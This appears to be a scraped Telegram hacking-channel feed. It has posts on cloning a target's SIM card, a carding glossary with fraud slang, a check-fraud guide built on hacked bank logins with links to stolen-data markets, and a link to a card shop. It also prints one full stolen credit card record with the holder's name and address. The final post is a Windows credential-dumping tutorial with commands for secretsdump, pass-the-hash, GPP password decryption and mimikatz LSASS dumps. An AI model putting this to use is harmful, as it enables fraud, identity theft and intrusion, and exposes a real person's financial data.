UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ HOW CLONE SIM CARD METHODE 2 :
T.me/UndercodeTesting

> How to clone SIM card using programmable cards :


> A SIM cloning can serve as a backup in case you lose or steal your mobile phone, or given the circumstances in which you need to solve problems related to the space of the calendar, text messages or others.

> Here we will teach you to use programmable cards to clone a SIM card but first, we want to explain to you that not all SIM cards can be cloned,
πŸ¦‘ just check the following differences:

COMP128v1: this kind of cards can be cloned easily.
COMP128v2: this contains a secure firmware making the cloning a really hard work.

> To perform this task, you will need certain components such as the following:

1. Blank SIM programmable Cards: These cards do not have phone numbers and you can purchase them online.

2. A SIM Firmware Writer: It allows you to copy many different numbers to one SIM card.

3. Download Woron Scan: Software for Reading

4. The target’s SIM for at least 30 minutes.

Now, proceed to follow the next steps to know how to clone a SIM card with a programmable card:

Step 1: connect the SIM Reader, install the Woron software and get the target’s SIM.

Step 2: Configure the software to clone SIM card.

Step 3: Run the IMSI Search. When the results appear, write them down and proceed to start the ICC Search and also write down the ICC number.

πŸ¦‘ Now Run the KI search and after it finishes, remove the target’s SIM card.

clone SIM card-Run the KI search

Step 4: Now is necessary to download the software SIM-EMU to write settings on Blank SIM Card, so insert it and wait a moment and run SIM-EMU and go to configure tab and add all the info obtained from the Woron scan process such as IMSI, KI, ICC and for the rest info, add:

For ADN/SMS/FDN# (ADN= Abbreviated Dialing No./

SMS = No. of SMSes stored on SIM /

FDN = Fixed Dialing No.) Enter: 140 / 10 / 4

For the phone number, it should be with an International Format, for example: for Argentina +54 (the international code) 99999999999 (the number)

clone SIM card-write settings on Blank SIM Card

Step 5: Let The Writing Begin, Select the Write To Disk button and Name the File: SuperSIM.HEX. A write EEPROM file window will appear. Name the EEPROM file SuperSIM_EP.HEX and click the Save button.

clone SIM card-Name the File

Step 6: Now We Flash the files on Blank SIM Card so install the card that came with the card writer and adds the required files in the appropriate fields

clone SIM card-install the card

Step 7: run the writing task, Click on done when it has completed and the SIM cloning is ready.

BY DR. fone posted on undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ SIM CARD CLONING TWO METHODES
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Carding
> types of Visa

1 Classic: The Card is used worldwide in any locations designated by Visa, including ATMs, real and virtual Stores, and shops offering goods and services by mail and telephone.

2 Gold – This card has a higher limit capacity. Most used card and adopted worldwide.

3 Platinum – Card is having limits over $10,000.

4 Signature – No preset spending limit – great bin to get

5 Infinite – Most prestigious card with having virtually no limit. There is less in circulation so be alert when buying these. Use only with reputable sellers!

6 Business – it can be used for small to medium sized businesses, usually has a limit.

7 Corporate – it can be used with medium to large size businesses, having more limit than a Business card.

8 Black – It has limited membership. It has no limit only having $500 annual fee, high-end card.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ TERMS USED IN CARDING

> CC = means - Credit Card.

> CC FULLZ = means - CC details with all major Information about
the cc holder Which aside the ordinary cvv details "Fullz" includes D.O.B,
SSN, MMN & Security Q & A.
> VBV = means - Verified By Visa or NON - VBV.

> BTC = means BITCOIN.

> MCSC = means - MasterCard Secured Code.

> DROP = means - The Address where You want Your Carded items to be shipped to.

> CITY + STATE = means - Your IP's location which is Country or State and City must match the Billing City and State on the CC.

> BILL=SHIP = means - The CC Billing Address should be the 'Exact Same' as the Shipping Address 100%.

> ZIPCC/CCZIPCODE = Means - Similar meaning as the case of "City + State".

> CCSTATE/STATECC = Means - The CC Country and State should be
'Exact Same' as The Drop Address.

> RE-ROUTE = Means - Calling or Chatting Customer service to Change Bill=Ship to Ship to Drop Address But mostly maintaining CC name and Phone number by just giving out the drop Address as the Correct address to receive the Shipment.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Unicc shop will work under blockchain domain:
t.me/UndercodeTesting

> http://uniccshop.bazar/


You can easily get access to that when you install browser addon.

>https://blockchain-dns.info/ - download here for Firefox, Chrome

> https://peername.com/browser-extension/ - here for Opera
Or make use of https://fri-gate.org/ addon

But if you have another browser or another device (iOS, Android):

> Use https://www.opennic.org/ DNS servers, which will help you get access to our domain.


Change your internet connection DNS settings and set up one of the servers from the list: https://servers.opennic.org/

> Our extension improves and speeds up access to sites, without causing any inconvenience. With the help of the original algorithm of work, the speed of access to sites is increasing, which is very important.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘CCnum:: 4246315229559099
Cvv: 180
Expm: 04
Expy: 22
Fname: Christopher
Lname: Keon
Address: 86 Trinity Circle
City: FOUR OAKS
State: NC
Zip: 27524
Country: USA
Phone: 9103669170
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CARDING HOW TO THROW CHECK ?
fb.com/UndercodeTesting

πŸ¦‘ Tools
1)Bank Log ( Wells Fargo, Chase, SunTrust, TD Bank etc )
2)RDP
4) Checkbook
3) Common Sense

πŸ¦‘ Where i usually Get the tools.

1. http://slilpp.net
2. http://ordaproject.me/ (my new favorite)
3. http://pwoah7foa6au2pul.onion/search.php?s_userid=11513 safetybets on AlphaBay
Marketplace

πŸ¦‘ This next one is not as popular but they have really quality accounts.
4. http://www.sanwells.ws
5. www.checkbook.io (Here is where you get the Checks From)
The Bank Log Info we need (minimum)
For this process we need the following info:
β€’ Account holder name
β€’ Account Balance(so we know how much to send!)
β€’ Online Bank login Details.

πŸ¦‘ This can be accomplished with any bank that offers online banking, but I am going to run
through the process using Wells Fargo accounts as an Example.
Monitoring account balance and transaction history

> This will teach you how to monitor account balance and transaction history without even needing

> to login on the accounts and risk getting locked out whether it's your own bank drop or a hacked

> Wells Fargo login, it doesn't matter! Once you are in possession of full account numbers and

πŸ¦‘ routing and all details, then you should go to this website:
http://www.mint.com and apply with the full details to a free monitoring account Once you have
gotten the full account information create an account at mint.com and add the bank account. It's
very easy to do with the full account numbers/information you should have no problem

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ DUMPING ACCOUNTS FROM WINDOWS TUTORIAL :
t.me/UndercodeTesting

1) Dumping credentials on a Windows host
Once you’ve fully compromised a Windows host (by gaining SYSTEM-level privileges), your next move is to gather as many credentials as possible because they could grant you a greater level of access on the network, or the same passwords could be used elsewhere on other critical assets.

2) If the Windows host is part of an Active Directory domain, you’ll be on the hunt for privileged domain accounts, and your target will be (preferably) a member of the Domain Admins group.

πŸ¦‘The following techniques can be used to dump Windows credentials from an already-compromised Windows host.

3) Registry Hives
Get a copy of the SYSTEM, SECURITY and SAM hives and download them back to your local system:

C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
Password Hashes

4) Get the password hashes of the local accounts, the cached domain credentials and the LSA secrets in a single run with secretsdump :

$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies

[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
...
Local SAM Hashes
Crack the LM hashes (if any) using Ophcrack .
Crack the NT hashes using JtR or hashcat .
Remember that if you can’t crack promising password hashes, you can just pass the hash against other accounts using the same password on other hosts or even the domain.
πŸ¦‘ Cached Domain Credentials

1) These are the password hashes of domain users that have logged on to the host previously.

> Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 …). Note that you can’t perform β€œpass-the-hash” style attacks with this type of hash.

2) LSA Secrets
Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.

3) If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.

4) Use pth on Kali Linux or wce on your own Windows system to use these credentials.

$ pth-net rpc user -U 'securus\john-pc$%aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f' -S dc1.securus.corp.com
Administrator
hdes
...

5) Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted :

C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t

πŸ¦‘In-Memory Credentials
Dump clear-text passwords from memory using mimikatz and the Windows Task Manager to dump the LSASS process.

1) To do this, dump the lsass.exe process to a file using Windows built-in Task Manager with right-clicking β€œlsass.exe” then selecting β€œCreate Dump File” (since Vista) or Procdump (pre Vista) – alternatively, use some powershell-fu (see carnal0wnage blog post):

C:\> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1

2) Then dump the credentials offline using mimikatz and its minidump module:

C:\> mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit

3) Make sure you run mimikatz on the same major version and same architecture you pulled the process dump from (refer to this ).

Alternatively, you can upload and run wce on the host, but the binary is likely to get picked up by most Anti Virus software. Also, note that wce-v1.41beta still doesn’t seem to dump the passwords of outbound SMB sessions (that can be listed with β€œnet use” on the compromised Windows system), although mimikatz will.
πŸ¦‘Credential Manager :

1) When a user authenticates to a network share, a proxy, or uses a piece of client software and ticks the β€œRemember my password” box, the password is typically stored in an encrypted vault using the Windows Data Protection API. You can see every saved credential in the Credential Manager (accessed through User Accounts in the Control Panel), and you can dump them with Network Password Recovery . Remember to run the 64-bit version on a 64-bit Windows instances, or you won’t get them all.

2) Protected Storage
Dump any passwords remembered in IE, Outlook or MSN using Protected Storage PassView .

3) Third-party software
NirSoft offers many tools to recover passwords stored by third-party software.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁